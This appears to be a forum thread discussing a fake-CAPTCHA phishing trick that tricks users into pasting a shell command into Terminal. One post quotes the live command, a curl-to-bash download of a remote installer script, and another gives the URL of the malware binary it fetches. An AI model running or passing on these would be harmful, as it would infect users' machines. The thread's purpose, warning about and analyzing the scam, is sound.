> as ChatGPT confirmed when I asked it to analyze it lol we are so cooked
If the LLM takes it upon itself to download malware, the user is protected.
41–50 of 267 posts
> as ChatGPT confirmed when I asked it to analyze it lol we are so cooked
If the LLM takes it upon itself to download malware, the user is protected.
I got one of these too, ostensibly from Cloudflare: https://imgur.com/a/FZM22Lg This is what it put in my clipboard for me to paste: /bin/bash -c "$(curl -fsSL https://cogideotekblablivefox.monster/installer.sh)"
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!". Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
> as ChatGPT confirmed when I asked it to analyze it lol we are so cooked
I don't understand? It's actually a pretty good idea - ChatGPT will download whatever the link contains in its own sandboxed environment, without endangering your own machine. Or do you mean something else by saying we're cooked?
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!". Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
Enough that it's still a valid tactic.
I've seen these on comporimsed wordpress sites a lot. Will copy the command to the clipboard and instruct the user to either open up PowerShell and paste it or just paste in the Win+R Run dialog.
These types of phishs have been around for a really long time.
Earlier quoted context omitted.
I don't understand? It's actually a pretty good idea - ChatGPT will download whatever the link contains in its own sandboxed environment, without endangering your own machine. Or do you mean something else by saying we're cooked?
Perhaps he means, "We have this massive AI problem", and the default answer being: "Let's add more AI into the mix"
> ChatGPT confirmed Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
Especially when it's just a base64 decode directly piped into bash.
> as ChatGPT confirmed when I asked it to analyze it lol we are so cooked
https://duckduckgo.com/?t=ffab&q=base64+decode+Y3VybCAtc0wgL...
$ file -b grecaptcha
Mach-O universal binary with 2 architectures: [x86_64:\012- Mach-O 64-bit x86_64 executable, flags:] [\012- arm64:\012- Mach-O 64-bit arm64 executable, flags:]
I cannot perform a dynamic analysis as I do not have macOS. :(May anyone do it for me? Use "otool", "dtruss", and "tcpdump" or something. :D Be careful!
The executable is available here: https://www.amanagencies.com/assets/js/grecaptcha as per decoded base64.